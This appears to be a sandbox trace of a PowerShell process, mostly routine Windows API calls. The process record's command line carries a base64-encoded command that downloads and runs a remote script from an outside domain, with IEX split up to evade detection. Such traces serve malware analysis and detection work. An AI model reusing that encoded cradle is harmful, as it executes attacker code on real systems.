	[0943.720] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0943.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.720] CoTaskMemFree (pv=0x413aa0) 
	[0943.721] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0943.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.721] CoTaskMemFree (pv=0x413aa0) 
	[0944.342] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0944.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.342] CoTaskMemFree (pv=0x413aa0) 
	[0944.342] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0944.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.343] CoTaskMemFree (pv=0x413aa0) 
	[0944.343] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0944.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.343] CoTaskMemFree (pv=0x413aa0) 
	[0946.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0946.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0947.256] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0947.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.256] CoTaskMemFree (pv=0x413aa0) 
	[0947.258] CoTaskMemAlloc (cb=0x104) returned 0x413aa0
	[0947.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.258] CoTaskMemFree (pv=0x413aa0) 
	[0947.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0960.197] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0960.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.197] CoTaskMemFree (pv=0x413cc0) 
	[0960.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0960.842] SetErrorMode (uMode=0x1) returned 0x1
	[0960.843] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ad880 | out: lpFileInformation=0x1ad880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0960.843] SetErrorMode (uMode=0x1) returned 0x1
	[0982.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.775] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.775] CoTaskMemFree (pv=0x413cc0) 
	[0982.778] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.778] CoTaskMemFree (pv=0x413cc0) 
	[0982.779] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.779] CoTaskMemFree (pv=0x413cc0) 
	[0982.782] CoCreateGuid (in: pguid=0x1adc48 | out: pguid=0x1adc48*(Data1=0x723b50a4, Data2=0x700a, Data3=0x4bb8, Data4=([0]=0x8d, [1]=0x26, [2]=0x5c, [3]=0x50, [4]=0x78, [5]=0x6f, [6]=0x30, [7]=0xd3))) returned 0x0
	[0982.788] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.788] CoTaskMemFree (pv=0x413cc0) 
	[0982.791] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.791] CoTaskMemFree (pv=0x413cc0) 
	[0982.794] CoTaskMemAlloc (cb=0x104) returned 0x413cc0
	[0982.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.794] CoTaskMemFree (pv=0x413cc0) 
	[0982.812] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0982.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ad8f0 | out: lpConsoleScreenBufferInfo=0x1ad8f0) returned 1
	[0983.020] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0983.021] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad8f0 | out: lpConsoleScreenBufferInfo=0x1ad8f0) returned 1
	[0983.022] GetVersionExW (in: lpVersionInformation=0x1ad880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0983.025] GetCurrentProcess () returned 0xffffffffffffffff
	[0983.026] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ad918 | out: TokenHandle=0x1ad918*=0x308) returned 1
	[0983.030] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad838 | out: TokenInformation=0x0, ReturnLength=0x1ad838) returned 0
	[0983.031] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x387280
	[0983.031] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x387280, TokenInformationLength=0x4, ReturnLength=0x1ad838 | out: TokenInformation=0x387280, ReturnLength=0x1ad838) returned 1
	[0983.031] DuplicateTokenEx (in: hExistingToken=0x308, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ad998 | out: phNewToken=0x1ad998*=0x2c8) returned 1
	[0983.031] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad838 | out: TokenInformation=0x0, ReturnLength=0x1ad838) returned 0
	[0983.032] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x3872b0, TokenInformationLength=0x4, ReturnLength=0x1ad838 | out: TokenInformation=0x3872b0, ReturnLength=0x1ad838) returned 1
	[0983.032] CheckTokenMembership (in: TokenHandle=0x2c8, SidToCheck=0x2d6d900*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ad9a8 | out: IsMember=0x1ad9a8) returned 1
	[0983.032] CloseHandle (hObject=0x2c8) returned 1
	[0983.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.367] CoTaskMemAlloc (cb=0x804) returned 0x1b770080
	[0983.367] GetConsoleTitleW (in: lpConsoleTitle=0x1b770080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0983.373] CoTaskMemFree (pv=0x1b770080) 

Thread:
	id = 706
	os_tid = 0x15fc


Thread:
	id = 723
	os_tid = 0x1644


Thread:
	id = 1294
	os_tid = 0x1d44


Thread:
	id = 1300
	os_tid = 0x1d5c


Thread:
	id = 1420
	os_tid = 0x1628


Thread:
	id = 1524
	os_tid = 0x1e08


Thread:
	id = 1632
	os_tid = 0x2234


Thread:
	id = 1633
	os_tid = 0x2238

	[0828.336] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2147
	os_tid = 0x2474


Process:
	id = "132"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5a9c1000"
	os_pid = "0x14f0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "31"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 673
	os_tid = 0x14f4

	[0433.622] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0571.750] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0579.810] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0579.810] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0579.810] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0579.810] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0590.119] sprintf_s (in: _DstBuf=0x16f458, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0596.857] GetVersionExW (in: lpVersionInformation=0x16df60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16df60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0596.859] GetVersionExW (in: lpVersionInformation=0x16df60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16df60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0596.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0596.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0596.871] GetVersionExW (in: lpVersionInformation=0x16dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0596.872] SetErrorMode (uMode=0x1) returned 0x1
	[0596.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16de30 | out: lpFileInformation=0x16de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0596.874] SetErrorMode (uMode=0x1) returned 0x1
	[0598.008] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e0a0 | out: lpdwHandle=0x16e0a0) returned 0x94c
	[0598.011] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b272a0 | out: lpData=0x2b272a0) returned 1
	[0598.014] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e018, puLen=0x16e010 | out: lplpBuffer=0x16e018*=0x2b2733c, puLen=0x16e010) returned 1
	[0598.016] lstrlenW (lpString="䅁") returned 1
	[0598.036] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b27418, puLen=0x16df80) returned 1
	[0598.036] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0598.039] CoTaskMemAlloc (cb=0x2e) returned 0x341dd0
	[0598.039] lstrcpyW (in: lpString1=0x341dd0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0598.040] CoTaskMemFree (pv=0x341dd0) 
	[0598.040] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b2746c, puLen=0x16df80) returned 1
	[0598.040] lstrlenW (lpString="System.Management.Automation") returned 28
	[0598.040] CoTaskMemAlloc (cb=0x3c) returned 0x27a010
	[0598.040] lstrcpyW (in: lpString1=0x27a010, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0598.040] CoTaskMemFree (pv=0x27a010) 
	[0598.040] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b274c8, puLen=0x16df80) returned 1
	[0598.040] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.040] CoTaskMemAlloc (cb=0x20) returned 0x340170
	[0598.040] lstrcpyW (in: lpString1=0x340170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.040] CoTaskMemFree (pv=0x340170) 
	[0598.040] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b27508, puLen=0x16df80) returned 1
	[0598.040] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.041] CoTaskMemAlloc (cb=0x44) returned 0x27a010
	[0598.041] lstrcpyW (in: lpString1=0x27a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.041] CoTaskMemFree (pv=0x27a010) 
	[0598.041] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b27570, puLen=0x16df80) returned 1
	[0598.041] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0598.041] CoTaskMemAlloc (cb=0x76) returned 0x2df3d0
	[0598.041] lstrcpyW (in: lpString1=0x2df3d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0598.041] CoTaskMemFree (pv=0x2df3d0) 
	[0598.041] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b2760c, puLen=0x16df80) returned 1
	[0598.041] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.041] CoTaskMemAlloc (cb=0x44) returned 0x27a010
	[0598.041] lstrcpyW (in: lpString1=0x27a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.041] CoTaskMemFree (pv=0x27a010) 
	[0598.041] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b27670, puLen=0x16df80) returned 1
	[0598.041] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0598.041] CoTaskMemAlloc (cb=0x58) returned 0x2a04c0
	[0598.041] lstrcpyW (in: lpString1=0x2a04c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0598.041] CoTaskMemFree (pv=0x2a04c0) 
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b276ec, puLen=0x16df80) returned 1
	[0598.042] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.042] CoTaskMemAlloc (cb=0x20) returned 0x340170
	[0598.042] lstrcpyW (in: lpString1=0x340170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.042] CoTaskMemFree (pv=0x340170) 
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x2b27394, puLen=0x16df80) returned 1
	[0598.042] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0598.042] CoTaskMemAlloc (cb=0x66) returned 0x33aa60
	[0598.042] lstrcpyW (in: lpString1=0x33aa60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0598.042] CoTaskMemFree (pv=0x33aa60) 
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x0, puLen=0x16df80) returned 0
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x0, puLen=0x16df80) returned 0
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16df88, puLen=0x16df80 | out: lplpBuffer=0x16df88*=0x0, puLen=0x16df80) returned 0
	[0598.042] VerQueryValueW (in: pBlock=0x2b272a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2b2733c, puLen=0x16df50) returned 1
	[0598.043] CoTaskMemAlloc (cb=0x204) returned 0x2e20d0
	[0598.043] VerLanguageNameW (in: wLang=0x0, szLang=0x2e20d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
